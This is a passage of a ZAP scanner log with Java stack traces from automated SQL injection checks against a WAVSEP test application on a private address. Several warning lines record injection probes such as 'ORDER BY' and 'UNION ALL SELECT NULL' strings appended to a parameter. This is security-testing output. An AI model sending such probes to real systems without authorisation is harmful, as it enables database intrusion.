org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922634 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922636 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1119-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1119-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922637 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922638 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922639 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922641 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922642 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922643 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922644 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922645 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922646 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922647 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922648 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1# at 